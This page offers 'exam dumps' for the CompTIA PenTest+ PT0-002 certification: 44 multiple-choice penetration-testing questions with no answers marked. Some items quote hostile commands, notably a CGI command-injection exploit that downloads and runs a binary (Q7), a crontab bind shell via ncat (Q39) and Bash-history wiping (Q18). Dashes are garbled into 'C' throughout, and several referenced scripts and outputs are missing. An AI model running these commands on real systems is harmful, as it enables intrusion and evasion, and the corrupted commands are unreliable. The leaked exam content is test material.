CompTIA PenTest+ PT0-002 Exam Dumps

Pdfprep

3 years ago

According to the news from CompTIA official website, PT0-001 exam will be retired in April, 2022, and the new upgrade test for CompTIA PenTest+ certification is PT0-002. The CompTIA PenTest+ will certify the successful candidate has the knowledge and skills required to plan and scope a penetration testing engagement including vulnerability scanning, understand legal and compliance requirements, analyze results, and produce a written report with remediation techniques. We provide the latest CompTIA certification PT0-002 exam dumps, which are valid for you to pass the test. Share some free CompTIA PenTest+ PT0-002 exam dumps below.

Page 1 of 5

1. A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function.

Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

Alternate data streams

PowerShell modules

MP4 steganography

PsExec

2. A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache.

Which of the following commands will accomplish this task?

nmap Cf CsV Cp80 192.168.1.20

nmap CsS CsL Cp80 192.168.1.20

nmap CA CT4 Cp80 192.168.1.20

nmap CO Cv Cp80 192.168.1.20

3. A penetration tester runs the following command on a system:

find / -user root Cperm -4000 Cprint 2>/dev/null

Which of the following is the tester trying to accomplish?

Set the SGID on all files in the / directory

Find the /root directory on the system

Find files with the SUID bit set

Find files that were created during exploitation and move them to /dev/null

4. A penetration tester logs in as a user in the cloud environment of a company.

Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

iam_enum_permissions

iam_privesc_scan

iam_backdoor_assume_role

iam_bruteforce_permissions

5. A penetration tester ran an Nmap scan on an Internet-facing network device with the CF option and found a few open ports.

To further enumerate, the tester ran another scan using the following command:

nmap CO CA CsS Cp- 100.100.100.50

Nmap returned that all 65,535 ports were filtered.

Which of the following MOST likely occurred on the second scan?

A firewall or IPS blocked the scan.

The penetration tester used unsupported flags.

The edge network device was disconnected.

The scan returned ICMP echo replies.

6. A penetration tester is working on a scoping document with a new client.

The methodology the client uses includes the following:

✑ Pre-engagement interaction (scoping and ROE)

✑ Intelligence gathering (reconnaissance)

✑ Threat modeling

✑ Vulnerability analysis

✑ Exploitation and post exploitation

✑ Reporting

Which of the following methodologies does the client use?

OWASP Web Security Testing Guide

PTES technical guidelines

NIST SP 800-115

OSSTMM

7. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

grep Cv apache ~/.bash_history > ~/.bash_history

rm Crf /tmp/apache

chmod 600 /tmp/apache

taskkill /IM “apache” /F

8. Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

NDA

MSA

SOW

MOU

9. A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011.

Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

Nmap

tcpdump

Scapy

hping3

10. A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server | rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00 8443/tcp open http Microsoft IIS httpd 8.5 | http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

ftp 192.168.53.23

smbclient \\WEB3\IPC$ -I 192.168.53.23 CU guest

ncrack Cu Administrator CP 15worst_passwords.txt Cp rdp 192.168.53.23

curl CX TRACE https://192.168.53.23:8443/index.aspx

nmap C-script vuln CsV 192.168.53.23

Page 2 of 5

11. A company becomes concerned when the security alarms are triggered during a penetration test.

Which of the following should the company do NEXT?

Halt the penetration test.

Conduct an incident response.

Deconflict with the penetration tester.

Assume the alert is from the penetration test.

12. A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging.

Which of the following techniques would BEST accomplish this goal?

RFID cloning

RFID tagging

Meta tagging

Tag nesting

13. A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday.

Which of the following should the security company have acquired BEFORE the start of the assessment?

A signed statement of work

The correct user accounts and associated passwords

The expected time frame of the assessment

The proper emergency contacts for the client

14. Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

Website scraping

Website cloning

Domain enumeration

URL enumeration

15. User credentials were captured from a database during an assessment and cracked using rainbow tables.

Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

MD5

bcrypt

SHA-1

PBKDF2

16. A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

Determine active hosts on the network.

Set the TTL of ping packets for stealth.

Fill the ARP table of the networked devices.

Scan the system on the most used ports.

17. A penetration tester has been given eight business hours to gain access to a client’s financial system.

Which of the following techniques will have the highest likelihood of success?

Attempting to tailgate an employee going into the client's workplace

Dropping a malicious USB key with the company’s logo in the parking lot

Using a brute-force attack against the external perimeter to gain a foothold

Performing spear phishing against employees by posing as senior management

18. A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch Cr .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

Redirecting Bash history to /dev/null

Making a copy of the user's Bash history for further enumeration

Covering tracks by clearing the Bash history

Making decoy files on the system to confuse incident responders

19. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

Windows

Apple

Linux

Android

20. A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

Look for open ports.

Listen for a reverse shell.

Attempt to flood open ports.

Create an encrypted tunnel.

Page 3 of 5

21. A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building.

Which of the following techniques would be BEST to use to gain confidential information?

Badge cloning

Dumpster diving

Tailgating

Shoulder surfing

22. A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZE:214)

...

DOWNLOADED: 4612 C FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

index.html

about

info

home.html

23. Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

Whether the cloud service provider allows the penetration tester to test the environment

Whether the specific cloud services are being used by the application

The geographical location where the cloud services are running

Whether the country where the cloud service is based has any impeding laws

24. A client has requested that the penetration test scan include the following UDP services:

SNMP, NetBIOS, and DNS.

Which of the following Nmap commands will perform the scan?

nmap Cvv sUV Cp 53, 123-159 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53,123,161-162 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53,137-139,161-162 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53, 122-123, 160-161 10.10.1.20/24 CoA udpscan

25. Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

The CVSS score of the finding

The network location of the vulnerable device

The vulnerability identifier

The client acceptance form

The name of the person who found the flaw

The tool used to find the issue

26. A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.

Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

IP addresses and subdomains

Zone transfers

DNS forward and reverse lookups

Internet search engines

Externally facing open ports

Shodan results

27. A company recruited a penetration tester to configure wireless IDS over the network.

Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

Aircrack-ng

Wireshark

Wifite

Kismet

28. A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.

Which of the following social-engineering attacks was the tester utilizing?

Phishing

Tailgating

Baiting

Shoulder surfing

29. A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service.

Which of the following methods would BEST support validation of the possible findings?

Manually check the version number of the VoIP service against the CVE release

Test with proof-of-concept code from an exploit database

Review SIP traffic from an on-path position to look for indicators of compromise

Utilize an nmap CsV scan against the service

30. A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

nmap CoG list.txt 192.168.0.1-254 , sort

nmap Csn 192.168.0.1-254 , grep “Nmap scan” | awk ‘{print S5}’

nmap C-open 192.168.0.1-254, uniq

nmap Co 192.168.0.1-254, cut Cf 2

Page 4 of 5

31. Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Buffer overflows

Cross-site scripting

Race-condition attacks

Zero-day attacks

Injection flaws

Ransomware attacks

32. A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.

Which of the following attack types is MOST concerning to the company?

Data flooding

Session riding

Cybersquatting

Side channel

33. Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Executive summary of the penetration-testing methods used

Bill of materials including supplies, subcontracts, and costs incurred during assessment

Quantitative impact assessments given a successful software compromise

Code context for instances of unsafe type-casting operations

34. A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped.

Which of the following would be the BEST recommendation to prevent this type of activity in the future?

Enforce mandatory employee vacations

Implement multifactor authentication

Install video surveillance equipment in the office

Encrypt passwords for bank account information

35. A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.

Which of the following should the tester do NEXT?

Reach out to the primary point of contact

Try to take down the attackers

Call law enforcement officials immediately

Collect the proper evidence and add to the final report

36. Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

will reveal vulnerabilities in the Modbus protocol.

may cause unintended failures in control systems.

may reduce the true positive rate of findings.

will create a denial-of-service condition on the IP networks.

37. A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.

Which of the following commands should be used to accomplish the goal?

VRFY and EXPN

VRFY and TURN

EXPN and TURN

RCPT TO and VRFY

38. A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Perform forensic analysis to isolate the means of compromise and determine attribution.

Incorporate the newly identified method of compromise into the red team’s approach.

Create a detailed document of findings before continuing with the assessment.

Halt the assessment and follow the reporting procedures as outlined in the contract.

39. A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop.

Which of the following can be used to ensure the tester is able to maintain access to the system?

schtasks /create /sc /ONSTART /tr C:TempWindowsUpdate.exe

wmic startup get caption,command

crontab Cl; echo “@reboot sleep 200 && ncat Clvp 4242 Ce /bin/bash”) | crontab 2>/dev/null

sudo useradd Cou 0 Cg 0 user

40. A penetration tester performs the following command:

curl CI Chttp2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

Option A

Option B

Option C

Option D

Page 5 of 5

41. In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers.

Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

Test for RFC-defined protocol conformance.

Attempt to brute force authentication to the service.

Perform a reverse DNS query and match to the service banner.

Check for an open relay configuration.

42. A penetration tester is scanning a corporate lab network for potentially vulnerable services.

Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

nmap192.168.1.1-5CPU22-25,80

nmap192.168.1.1-5CPA22-25,80

nmap192.168.1.1-5CPS22-25,80

nmap192.168.1.1-5CSs22-25,80

43. A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.

Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

PLCs will not act upon commands injected over the network.

Supervisors and controllers are on a separate virtual network by default.

Controllers will not validate the origin of commands.

Supervisory systems will detect a malicious injection of code/commands.

44. A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract.

Which of the following concerns would BEST support the software company’s request?

The reverse-engineering team may have a history of selling exploits to third parties.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

The reverse-engineering team will be given access to source code for analysis.

Categories: CompTIA Online Questions

Tags: CompTIA certification PT0-002 exam, PT0-002 exam dumps, CompTIA certification PT0-002 exam dumps, free CompTIA PenTest+ PT0-002 exam, CompTIA PenTest+ PT0-002 exam dumps, CompTIA PenTest+ PT0-002 exam